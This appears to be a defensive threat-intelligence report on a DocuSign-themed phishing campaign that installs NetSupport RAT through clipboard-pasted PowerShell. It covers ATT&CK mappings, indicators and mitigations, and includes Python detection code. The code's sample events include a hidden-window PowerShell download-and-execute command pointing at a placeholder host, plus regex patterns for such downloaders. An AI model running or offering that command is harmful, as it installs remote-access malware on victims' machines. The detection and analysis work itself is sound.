Full Report
Malware campaign used fake DocuSign pages to deploy NetSupport RAT through clipboard manipulation
Analysis Summary
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan leveraged in a multi-stage malware campaign that utilizes fake DocuSign verification pages to trick users into executing malicious code on their systems. The goal is to establish persistent remote access for the attacker.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (implied by usage of PowerShell and Windows Run prompt)
- Capabilities: Remote control, persistence establishment, multi-stage download, obfuscation.
- First Seen: Not specified in the context, but the campaign exploiting DocuSign pages is recent/newly uncovered.
## MITRE ATT&CK Mapping
The described execution flow maps to several standard MITRE ATT&CK techniques:
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - **T1566.002 - Spearphishing via Link** (implied by directing the user to a fake page)
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - **T1059.001 - PowerShell** (used to download and execute the second-stage payload)
  - T1204 - User Execution
    - **T1204.002 - Malicious File** (the user executes the clipboard-delivered script)
- **TA0003 - Persistence**
  - T1547 - Boot or Logon Autostart Execution
    - **T1547.001 - Registry Run Keys / Startup Folder** (placing a shortcut in the Startup folder)
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol (likely used by NetSupport RAT for C2 communication)
## Functionality
### Core Capabilities
- Deceptive phishing via spoofed DocuSign verification pages.
- Clipboard poisoning to inject malicious commands.
- Execution of a malicious PowerShell script.
- Downloading and deploying a second-stage executable payload.
- Establishing persistence via the Windows Startup folder.
### Advanced Features
- **Obfuscation:** The initial script utilized ROT13 encoding to hide its intent.
- **Branding Mimicry:** Blending Cloudflare and DocuSign branding to enhance legitimacy.
- **Multi-Stage Delivery:** Utilizing sequential stages (initial script -> second-stage executable via GitHub -> final RAT payload) to complicate analysis and bypass initial defenses.
## Indicators of Compromise
- File Hashes: [Not provided]
- File Names: [Not provided; the second stage likely uses generic or disguised executable names]
- Registry Keys: [None reported; persistence is achieved through the Startup folder rather than a registry Run key]
- Network Indicators: [C2 channels inherent to NetSupport RAT; specific IPs/domains: Not provided]
- Behavioral Indicators:
  - User interaction with a fake CAPTCHA/verification page.
  - Execution of pasted PowerShell commands from the clipboard via the Run prompt (`Win+R`).
  - Creation of a new shortcut file in the `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` directory or a similar location.
## Associated Threat Actors
- Threat actors behind the specific campaign leveraging the DocuSign theme are not explicitly named in the provided text. NetSupport RAT itself is a commercially available tool often leveraged by various malicious actors.
## Detection Methods
- Signature-based detection: Requires signatures for the final NetSupport RAT executable and the specific obfuscated PowerShell payload.
- Behavioral detection: Monitoring for the sequence of clipboard manipulation followed by PowerShell execution launched from the Run prompt (which appears as a PowerShell child of `explorer.exe`), or the creation of Startup-folder shortcuts pointing to dynamically downloaded, unsigned binaries.
- YARA rules: [Not provided]
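As an added example (not part of this report), the behavioral detection above expressed as correlation logic in Python over constructed Sysmon-style records: a PowerShell launch whose parent is `explorer.exe` (how Run-prompt commands appear) with hidden-window or download switches, followed within a time window on the same host by a `.lnk` created in the Startup folder. The field names, timestamps and sample paths are assumptions for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (simplified Sysmon-like process-create and
# file-create records). WS01 shows the sequence described in the report:
# Run prompt -> PowerShell downloader -> Startup-folder shortcut.
# WS02 is a benign PowerShell launch from a developer tool (no alert).
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": "2024-05-01T10:00:05", "type": "process_create",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/x)"'},
    {"host": "WS01", "ts": "2024-05-01T10:00:41", "type": "file_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.lnk"},
    {"host": "WS02", "ts": "2024-05-01T11:00:00", "type": "process_create",
     "parent": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

# Command-line switches and cmdlets typical of paste-and-run downloaders.
SUSPICIOUS_CMD = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|\biex\b|"
    r"invoke-expression|\biwr\b|invoke-webrequest|downloadstring|-enc", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
WINDOW = timedelta(minutes=10)  # assumed correlation window

def run_prompt_powershell(ev):
    """PowerShell spawned by explorer.exe (Run prompt) with downloader traits."""
    return (ev["type"] == "process_create"
            and ev["parent"].lower().endswith(r"\explorer.exe")
            and ev["image"].lower().endswith(r"\powershell.exe")
            and SUSPICIOUS_CMD.search(ev["cmdline"]) is not None)

def startup_shortcut(ev):
    """A .lnk written into the per-user Startup folder (persistence step)."""
    return ev["type"] == "file_create" and STARTUP_LNK.search(ev["target"]) is not None

def correlate(events, window=WINDOW):
    """Return hosts where a suspicious Run-prompt launch is followed within
    `window` by a Startup-folder shortcut, with the evidence for each hit."""
    hits, launches = {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if run_prompt_powershell(ev):
            launches[ev["host"]] = t
        elif startup_shortcut(ev):
            start = launches.get(ev["host"])
            if start is not None and t - start <= window:
                hits[ev["host"]] = {"launch": start.isoformat(), "lnk": ev["target"]}
    return hits
```

Either predicate alone is a useful low-severity signal; the correlated pair is what warrants an incident ticket.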
## Mitigation Strategies
- **User Education:** Training users to be highly suspicious of unexpected documents requiring urgent verification, especially those prompting manual command line execution.
- **Endpoint Visibility:** Implementing robust logging for PowerShell execution (script block and process command-line logging), with particular attention to commands pasted from the clipboard and launched via the Run prompt.
- **Application Control:** Restricting the execution of unsigned or unknown executables downloaded dynamically.
- **Network Filtering:** Monitoring outbound connections from endpoints to known file-sharing services like GitHub being used to host malicious binaries.
## Related Tools/Techniques
- Clipboard-Injector Attacks (mentioned generally in the context of clipboard poisoning).
- Legitimate Remote Access Software used maliciously (RATs).